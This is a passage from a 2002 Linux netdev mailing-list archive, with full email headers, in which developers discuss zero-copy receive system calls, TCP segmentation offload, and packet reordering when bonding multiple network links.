Apache could do this, I doubt it does currently. > > The corollary with sys_receivefile would be that the user: > > 1) mmap()'s a file with MAP_SHARED to write the data > 2) uses sys_receivefile() to pull in the data from the socket to that file > > There is no need to poll the receive socket space as the successful > return from sys_receivefile() is the "data got received successfully" > event. the send case has been well described and seems to work well for the people for whom that is the bottleneck. that has not been the case in HPC, since sends are relatively cheaper (in terms of cpu) than receives. who is working on this architecture for receives? i know quite a few people who would be interested in working on it and willing to prototype as well. > totally agreed. this is a must for high-performance computing now (since > who wants to waste 80-100% of their CPU just running the network)?
> > If send side is your bottleneck and you think zerocopy sends of > user anonymous data might help, see the above since we can do it > today and you are free to experiment. for many of the applications that i care about, receive is the bottleneck, so zerocopy sends are somewhat of a non-issue (not that they're not nice, they just don't solve the primary waste of processor resources). is there a beginning implementation yet of zerocopy receives as you describe above, or would you be interested in entertaining implementations that work on existing (1Gig-e) cards? what i'm thinking is something that prototypes the api to the nic that you are proposing and implements the NIC-side functionality in firmware on the acenic-2's (which have available firmware in at least two implementations--the alteon version and pete wyckoff's version (which may be less license-encumbered)). this is obviously only feasible if there already exists some consensus on what the os-to-hardware API should look like (or there is willingness to try to build a consensus around that now). t. -- todd underwood, vp & cto oso grande technologies, inc. todd@osogrande.com "Those who give up essential liberties for temporary safety deserve neither liberty nor safety."
- Benjamin Franklin From greearb@candelatech.com Mon Sep 16 09:09:45 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 09:09:47 -0700 (PDT) Received: from grok.yi.org (IDENT:oeEAFqMOnTBWPs98wy98RmO/qE60itS7@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GG9itG004698 for ; Mon, 16 Sep 2002 09:09:45 -0700 Received: from candelatech.com (IDENT:Iczj2MzfAtIPNA6lnE2Aa50tljr0pojL@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8GG9gv18559; Mon, 16 Sep 2002 09:09:42 -0700 Message-ID: <3D860246.3060609@candelatech.com> Date: Mon, 16 Sep 2002 09:09:42 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Chris Friesen CC: Cacophonix , linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation References: <20020913222213.69396.qmail@web14006.mail.yahoo.com> <3D85DB3D.DC65A80B@nortelnetworks.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 195 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Chris Friesen wrote: > Cacophonix wrote: > >>--- Chris Friesen wrote: > > >>>This has always confused me. Why doesn't the bonding driver try and spread >>>all the traffic over all the links? >> >>Because then you risk heavy packet reordering within an individual flow, >>which can be detrimental in some cases. >>--karthik > > > I can see how it could make the receiving host work more on reassembly, but if throughput is key, > wouldn't you still end up better if you can push twice as many packets through the pipe? 
> > Chris Also, I notice lots of out-of-order packets on a single gigE link when running at high speeds (SMP machine), so the kernel is still having to reorder quite a few packets. Has anyone done any tests to see how much worse it is with dual-port bonding? NAPI helps my problem, but does not make it go away entirely. Ben > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From facey_brian@bah.com Mon Sep 16 10:30:41 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 10:30:46 -0700 (PDT) Received: from mclean-vscan4.bah.com (mclean-vscan4.bah.com [156.80.3.64]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GHUetG008147 for ; Mon, 16 Sep 2002 10:30:41 -0700 Received: from mclean-vscan4.bah.com (mclean-vscan4.bah.com [156.80.3.64]) by mclean-vscan4.bah.com (8.11.0/8.11.0) with SMTP id g8GHZPO26230 for ; Mon, 16 Sep 2002 13:35:29 -0400 (EDT) Received: from mclean2-mail.usae.bah.com ([156.80.5.110]) by mclean-vscan4.bah.com (NAVGW 2.5.2.11) with SMTP id M2002091613352531210 for ; Mon, 16 Sep 2002 13:35:25 -0400 Received: from bah.com ([156.80.81.142]) by mclean2-mail.usae.bah.com (Netscape Messaging Server 4.15) with ESMTP id H2JKU600.A3Z for ; Mon, 16 Sep 2002 13:34:54 -0400 Message-ID: <3D86165C.F3320504@bah.com> Date: Mon, 16 Sep 2002 13:35:24 -0400 From: "Facey Brian" Organization: BAH X-Mailer: Mozilla 4.78 [en]C-CCK-MCD (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: netdev@oss.sgi.com Subject: Networking X-Priority: 2 (High) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 196 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: facey_brian@bah.com Precedence: bulk X-list: netdev Dear Net Developers, I inherited an SGI 320. I have Slackware 8.0 running on it and I am eager to connect it to the network. 
I edited rc.inet1 and ran it. Unfortunately, I could not configure eth0. Which driver do I need to select in rc.modules? Is the ethernet port SGI proprietary? Please advise. Thanks, Brian From davem@redhat.com Mon Sep 16 12:56:18 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 12:56:22 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GJuHtG010725 for ; Mon, 16 Sep 2002 12:56:17 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id MAA08873; Mon, 16 Sep 2002 12:52:11 -0700 Date: Mon, 16 Sep 2002 12:52:11 -0700 (PDT) Message-Id: <20020916.125211.82482173.davem@redhat.com> To: linux-kernel@vger.kernel.org, todd-lkml@osogrande.com Cc: hadi@cyberus.ca, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: References: <20020913.150439.27187393.davem@redhat.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 197 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: todd-lkml@osogrande.com Date: Mon, 16 Sep 2002 08:16:47 -0600 (MDT) are there any standards in progress to support this. Your question makes no sense, it is a hardware optimization of an existing standard. The chip merely is told what flows exist and it concatenates TCP data from consecutive packets for that flow if they arrive in sequence. who is working on this architecture for receives? Once cards with the feature exist, probably Alexey and myself will work on it. Basically, whoever isn't busy with something else once the technology appears.
is there a beginning implementation yet of zerocopy receives No. Franks a lot, David S. Miller davem@redhat.com From davem@redhat.com Mon Sep 16 12:59:56 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 12:59:57 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GJxttG011489 for ; Mon, 16 Sep 2002 12:59:55 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id MAA08917; Mon, 16 Sep 2002 12:55:55 -0700 Date: Mon, 16 Sep 2002 12:55:55 -0700 (PDT) Message-Id: <20020916.125555.36549381.davem@redhat.com> To: greearb@candelatech.com Cc: cfriesen@nortelnetworks.com, cacophonix@yahoo.com, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation From: "David S. Miller" In-Reply-To: <3D860246.3060609@candelatech.com> References: <20020913222213.69396.qmail@web14006.mail.yahoo.com> <3D85DB3D.DC65A80B@nortelnetworks.com> <3D860246.3060609@candelatech.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 198 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Ben Greear Date: Mon, 16 Sep 2002 09:09:42 -0700 NAPI helps my problem, but does not make it go away entirely. There is a lot of logic in our TCP input btw that notices packet reordering on the receive side and acts accordingly (ie. 
it does not fire off fast retransmits or backoff prematurely when reordering is detected) From yan@intruvert.com Mon Sep 16 13:08:05 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 13:08:10 -0700 (PDT) Received: from ivexgw1.intruvert.com (mx1.intruvert.com [65.209.235.20]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GK85tG011924 for ; Mon, 16 Sep 2002 13:08:05 -0700 Received: by ivexgw.intruvert.com with Internet Mail Service (5.5.2656.59) id ; Mon, 16 Sep 2002 13:12:55 -0700 Message-ID: From: Yan-Fa Li To: "'Ben Greear'" , Chris Friesen Cc: Cacophonix , linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: RE: bonding vs 802.3ad/Cisco EtherChannel link agregation Date: Mon, 16 Sep 2002 13:12:54 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2656.59) Content-Type: text/plain X-archive-position: 199 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yan@intruvert.com Precedence: bulk X-list: netdev I had similar problems with NAPI and DL2K. I was only able to "resolve" the issue by forcing my application and the NIC to a single CPU using CPU affinity hacks. -----Original Message----- From: Ben Greear [mailto:greearb@candelatech.com] Sent: Monday, September 16, 2002 9:10 AM To: Chris Friesen Cc: Cacophonix; linux-net@vger.kernel.org; netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation Chris Friesen wrote: > Cacophonix wrote: > >>--- Chris Friesen wrote: > > >>>This has always confused me. Why doesn't the bonding driver try and >>>spread all the traffic over all the links? >> >>Because then you risk heavy packet reordering within an individual >>flow, which can be detrimental in some cases. --karthik > > > I can see how it could make the receiving host work more on > reassembly, but if throughput is key, wouldn't you still end up better > if you can push twice as many packets through the pipe? 
> > Chris Also, I notice lots of out-of-order packets on a single gigE link when running at high speeds (SMP machine), so the kernel is still having to reorder quite a few packets. Has anyone done any tests to see how much worse it is with dual-port bonding? NAPI helps my problem, but does not make it go away entirely. Ben > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From cfriesen@nortelnetworks.com Mon Sep 16 14:05:37 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 14:06:38 -0700 (PDT) Received: from zcars0m9.ca.nortel.com (zcars0m9.nortelnetworks.com [47.129.242.157]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GL5btG014010 for ; Mon, 16 Sep 2002 14:05:37 -0700 Received: from zcars04f.ca.nortel.com (zcars04f.ca.nortel.com [47.129.242.57]) by zcars0m9.ca.nortel.com (Switch-2.2.0/Switch-2.2.0) with ESMTP id g8GLAAV08641; Mon, 16 Sep 2002 17:10:10 -0400 (EDT) Received: from zcard309.ca.nortel.com (zcard309.ca.nortel.com [47.129.242.69]) by zcars04f.ca.nortel.com (Switch-2.2.0/Switch-2.2.0) with ESMTP id g8GLA5t05468; Mon, 16 Sep 2002 17:10:05 -0400 (EDT) Received: from zcard0k6.ca.nortel.com ([47.129.242.158]) by zcard309.ca.nortel.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id RL8PHFWY; Mon, 16 Sep 2002 17:10:07 -0400 Received: from pcard0ks.ca.nortel.com ([47.129.117.131]) by zcard0k6.ca.nortel.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id RDHYHYKQ; Mon, 16 Sep 2002 17:10:07 -0400 Received: from nortelnetworks.com (localhost.localdomain [127.0.0.1]) by pcard0ks.ca.nortel.com (Postfix) with ESMTP id 4B23B2E112; Mon, 16 Sep 2002 17:10:06 -0400 (EDT) Message-ID: <3D8648AE.DD498ECE@nortelnetworks.com> Date: Mon, 16 Sep 2002 17:10:06 -0400 X-Sybari-Space: 00000000 00000000 00000000 From: Chris Friesen X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-6mdkenterprise i686) 
X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" Cc: greearb@candelatech.com, cacophonix@yahoo.com, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation References: <20020913222213.69396.qmail@web14006.mail.yahoo.com> <3D85DB3D.DC65A80B@nortelnetworks.com> <3D860246.3060609@candelatech.com> <20020916.125555.36549381.davem@redhat.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 200 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cfriesen@nortelnetworks.com Precedence: bulk X-list: netdev "David S. Miller" wrote: > There is a lot of logic in our TCP input btw that notices packet > reordering on the receive side and acts accordingly (ie. it does not > fire off fast retransmits or backoff prematurely when reordering > is detected) Okay, that makes me even more curious why we don't send successive packets out successive pipes in a bonded link. It seems to me that when sending packets out a bonded link, we should scan for the next device that has an opening on its queue (perhaps also taking into account link speed etc) so as to try and keep the entire aggregate link working at max capacity. Does this not make sense in the real world for some reason? Maybe a config option CONFIG_MAX_BONDED_THROUGHPUT to allow a single stream to take up the entire aggregate link even if it makes the receiver do more work? 
Chris From davem@redhat.com Mon Sep 16 14:08:53 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 14:08:54 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GL8rtG014373 for ; Mon, 16 Sep 2002 14:08:53 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id OAA09507; Mon, 16 Sep 2002 14:04:53 -0700 Date: Mon, 16 Sep 2002 14:04:53 -0700 (PDT) Message-Id: <20020916.140453.72638827.davem@redhat.com> To: cfriesen@nortelnetworks.com Cc: greearb@candelatech.com, cacophonix@yahoo.com, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation From: "David S. Miller" In-Reply-To: <3D8648AE.DD498ECE@nortelnetworks.com> References: <3D860246.3060609@candelatech.com> <20020916.125555.36549381.davem@redhat.com> <3D8648AE.DD498ECE@nortelnetworks.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 201 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Chris Friesen Date: Mon, 16 Sep 2002 17:10:06 -0400 Okay, that makes me even more curious why we don't send successive packets out successive pipes in a bonded link. This is not done because it leads to packet reordering which if bad enough can trigger retransmits. Scott Feldman's posting mentioned this, as did one other I think. Same flows (which in this context means TCP connection) must go over the same link to avoid packet reordering at the receiver. 
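The rule stated above (one flow, one link) can be sketched in plain userspace C as follows. This is an illustration only, not the bonding driver's actual transmit policy: struct flow_key, flow_to_link and the XOR-fold hash are all hypothetical names and choices made for this example.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical flow identifier: the TCP/IPv4 4-tuple. */
struct flow_key {
    uint32_t saddr;   /* source IPv4 address */
    uint32_t daddr;   /* destination IPv4 address */
    uint16_t sport;   /* source TCP port */
    uint16_t dport;   /* destination TCP port */
};

/*
 * Pick an outgoing link for a flow. Every packet of a given connection
 * hashes to the same link index, so packets within that flow are never
 * spread across links and cannot be reordered by the bond itself.
 * Assumption: a simple XOR-fold hash; any deterministic hash would do.
 */
static unsigned int flow_to_link(const struct flow_key *k, unsigned int nlinks)
{
    uint32_t h;

    assert(nlinks > 0);
    h = k->saddr ^ k->daddr ^ (((uint32_t)k->sport << 16) | k->dport);
    h ^= h >> 16;     /* fold high bits into the low bits */
    h ^= h >> 8;
    return h % nlinks;
}
```

The cost of this design is the one raised earlier in the thread: a single connection can never use more than one link's worth of bandwidth, while many concurrent connections spread across the aggregate.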
From cfriesen@nortelnetworks.com Mon Sep 16 14:17:58 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 14:19:00 -0700 (PDT) Received: from zcars0m9.ca.nortel.com (zcars0m9.nortelnetworks.com [47.129.242.157]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GLHwtG018067 for ; Mon, 16 Sep 2002 14:17:58 -0700 Received: from zcars04e.ca.nortel.com (zcars04e.ca.nortel.com [47.129.242.56]) by zcars0m9.ca.nortel.com (Switch-2.2.0/Switch-2.2.0) with ESMTP id g8GLMYV10351; Mon, 16 Sep 2002 17:22:34 -0400 (EDT) Received: from zcard309.ca.nortel.com (zcard309.ca.nortel.com [47.129.242.69]) by zcars04e.ca.nortel.com (Switch-2.2.0/Switch-2.2.0) with ESMTP id g8GLMSY25803; Mon, 16 Sep 2002 17:22:28 -0400 (EDT) Received: from zcard0k6.ca.nortel.com ([47.129.242.158]) by zcard309.ca.nortel.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id RL8PHF7W; Mon, 16 Sep 2002 17:22:32 -0400 Received: from pcard0ks.ca.nortel.com ([47.129.117.131]) by zcard0k6.ca.nortel.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id RDHYHYL4; Mon, 16 Sep 2002 17:22:32 -0400 Received: from nortelnetworks.com (localhost.localdomain [127.0.0.1]) by pcard0ks.ca.nortel.com (Postfix) with ESMTP id E23D12E112; Mon, 16 Sep 2002 17:22:30 -0400 (EDT) Message-ID: <3D864B96.6D0D43F4@nortelnetworks.com> Date: Mon, 16 Sep 2002 17:22:30 -0400 X-Sybari-Space: 00000000 00000000 00000000 From: Chris Friesen X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.18-6mdkenterprise i686) X-Accept-Language: en MIME-Version: 1.0 To: "David S. 
Miller" Cc: greearb@candelatech.com, cacophonix@yahoo.com, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation References: <3D860246.3060609@candelatech.com> <20020916.125555.36549381.davem@redhat.com> <3D8648AE.DD498ECE@nortelnetworks.com> <20020916.140453.72638827.davem@redhat.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 202 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cfriesen@nortelnetworks.com Precedence: bulk X-list: netdev "David S. Miller" wrote: > From: Chris Friesen > > Okay, that makes me even more curious why we don't send successive > packets out successive pipes in a bonded link. > > This is not done because it leads to packet reordering which > if bad enough can trigger retransmits. > > Scott Feldman's posting mentioned this, as did one other I > think. I did see those posts, but then I saw yours on how the linux receive end does the right thing with regards to reordering, and that confused me. So if I have it right linux-linux could theoretically work okay with a single stream over multiple links (potentially causing lots of reordering), but linux-router would not work well. 
Chris From davem@redhat.com Mon Sep 16 14:23:10 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 14:23:12 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GLMwtG018443 for ; Mon, 16 Sep 2002 14:23:05 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id OAA09608; Mon, 16 Sep 2002 14:17:30 -0700 Date: Mon, 16 Sep 2002 14:17:30 -0700 (PDT) Message-Id: <20020916.141730.20023507.davem@redhat.com> To: cfriesen@nortelnetworks.com Cc: greearb@candelatech.com, cacophonix@yahoo.com, linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation From: "David S. Miller" In-Reply-To: <3D864B96.6D0D43F4@nortelnetworks.com> References: <3D8648AE.DD498ECE@nortelnetworks.com> <20020916.140453.72638827.davem@redhat.com> <3D864B96.6D0D43F4@nortelnetworks.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 203 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Chris Friesen Date: Mon, 16 Sep 2002 17:22:30 -0400 I did see those posts, but then I saw yours on how the linux receive end does the right thing with regards to reordering, and that confused me. It's a last ditch effort to keep receive performance on the TCP connection reasonable, it is not meant to be a normal mode of operation. The reordering detection in the TCP stack does not get you back to optimal receive performance, it simply can't. For one thing, all of the fast paths in the TCP input paths require that the packets arrive in order. 
If bonding did what you suggest, reordering would become the norm and that isn't going to be good for TCP input performance whether we have reordering detection logic or not. From todd-lkml@osogrande.com Mon Sep 16 14:30:48 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 14:30:55 -0700 (PDT) Received: from puerco.nm.org (puerco.nm.org [129.121.1.22]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GLUmtG018897 for ; Mon, 16 Sep 2002 14:30:48 -0700 Received: (qmail 29754 invoked from network); 16 Sep 2002 21:31:55 -0000 Received: from unknown (HELO gallinas) (129.121.5.22) by puerco.nm.org with SMTP; 16 Sep 2002 21:31:55 -0000 Date: Mon, 16 Sep 2002 15:32:56 -0600 (MDT) From: todd-lkml@osogrande.com X-X-Sender: todd@gp.staff.osogrande.com Reply-To: linux-kernel@vger.kernel.org To: "David S. Miller" cc: "linux-kernel@vger.kernel.org" , "todd-lkml@osogrande.com" , "hadi@cyberus.ca" , "tcw@tempest.prismnet.com" , "netdev@oss.sgi.com" , "pfeather@cs.unm.edu" Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <20020916.125211.82482173.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 204 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: todd-lkml@osogrande.com Precedence: bulk X-list: netdev folx, perhaps i was insufficiently clear. On Mon, 16 Sep 2002, David S. Miller wrote: > are there any standards in progress to support this. > > Your question makes no sense, it is a hardware optimization > of an existing standard. The chip merely is told what flows > exist and it concatenates TCP data from consequetive packets > for that flow if they arrive in sequence. hardware optimizations can be standardized. in fact, when they are, it is substantially easier to implement to them. 
my assumption (perhaps incorrect) is that some core set of functionality is necessary for a card to support zero-copy receives (in particular, the ability to register cookies of expected data flows and the memory location to which they are to be sent). what 'existing standard' is this kernel<->api a standardization of? > who is working on this architecture for receives? > > Once cards with the feature exist, probably Alexey and myself > will work on it. > > Basically, who ever isn't busy with something else once the technology > appears. so if we wrote and distributed firmware for alteon acenics that supported this today, you would be willing to incorporate the new system calls into the networking code (along with the new firmware for the card, provided we could talk jes into accepting the changes, assuming he's still the maintainer of the driver)? that's great. > > is there a beginning implementation yet of zerocopy receives > > No. thanks for your feedback. t. -- todd underwood, vp & cto oso grande technologies, inc. todd@osogrande.com "Those who give up essential liberties for temporary safety deserve neither liberty nor safety." - Benjamin Franklin From davem@redhat.com Mon Sep 16 14:33:40 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 14:33:42 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GLXctG019256 for ; Mon, 16 Sep 2002 14:33:40 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id OAA09730; Mon, 16 Sep 2002 14:29:31 -0700 Date: Mon, 16 Sep 2002 14:29:31 -0700 (PDT) Message-Id: <20020916.142931.126209536.davem@redhat.com> To: linux-kernel@vger.kernel.org, todd-lkml@osogrande.com Cc: hadi@cyberus.ca, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. 
Miller" In-Reply-To: References: <20020916.125211.82482173.davem@redhat.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 205 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: todd-lkml@osogrande.com Date: Mon, 16 Sep 2002 15:32:56 -0600 (MDT) new system calls into the networking code The system calls would go into the VFS, sys_receivefile is not networking specific in any way shape or form. And to answer your question, if I had the time I'd work on it yes. Right now the answer to "well do you have the time" is no, I am working on something much more important wrt. Linux networking. I've hinted at what this is in previous postings, and if people can't figure out what it is I'm not going to mention this explicitly :-) From dwmw2@redhat.com Mon Sep 16 15:48:27 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 15:48:32 -0700 (PDT) Received: from passion.cambridge.redhat.com (dell-paw-3.cambridge.redhat.com [195.224.55.237]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GMmQtG023471 for ; Mon, 16 Sep 2002 15:48:27 -0700 Received: from dwmw2 (helo=redhat.com) by passion.cambridge.redhat.com with local-esmtp (Exim 3.35 #5) id 17r4jk-00039R-00; Mon, 16 Sep 2002 23:53:00 +0100 X-Mailer: exmh version 2.5 13/07/2001 with nmh-1.0.4 From: David Woodhouse X-Accept-Language: en_GB In-Reply-To: <20020916.142931.126209536.davem@redhat.com> References: <20020916.142931.126209536.davem@redhat.com> <20020916.125211.82482173.davem@redhat.com> To: "David S. 
Miller" Cc: linux-kernel@vger.kernel.org, todd-lkml@osogrande.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 16 Sep 2002 23:53:00 +0100 Message-ID: <12116.1032216780@redhat.com> X-archive-position: 206 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dwmw2@infradead.org Precedence: bulk X-list: netdev davem@redhat.com said: > new system calls into the networking code > The system calls would go into the VFS, sys_receivefile is not > networking specific in any way shape or form. Er, surely the same goes for sys_sendfile? Why have a new system call rather than just swapping the 'in' and 'out' fds? -- dwmw2 From davem@redhat.com Mon Sep 16 15:50:44 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 15:50:45 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GMoitG023823 for ; Mon, 16 Sep 2002 15:50:44 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id PAA10220; Mon, 16 Sep 2002 15:46:40 -0700 Date: Mon, 16 Sep 2002 15:46:40 -0700 (PDT) Message-Id: <20020916.154640.78359545.davem@redhat.com> To: dwmw2@infradead.org Cc: linux-kernel@vger.kernel.org, todd-lkml@osogrande.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. 
Miller" In-Reply-To: <12116.1032216780@redhat.com> References: <20020916.125211.82482173.davem@redhat.com> <12116.1032216780@redhat.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 207 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: David Woodhouse Date: Mon, 16 Sep 2002 23:53:00 +0100 Er, surely the same goes for sys_sendfile? Why have a new system call rather than just swapping the 'in' and 'out' fds? There is an assumption that one is a linear stream of output (in this case a socket) and the other one is a page cache based file. It would be nice to extend sys_sendfile to work properly in both ways in a manner that Linus would accept, want to work on that? From dwmw2@redhat.com Mon Sep 16 15:58:45 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 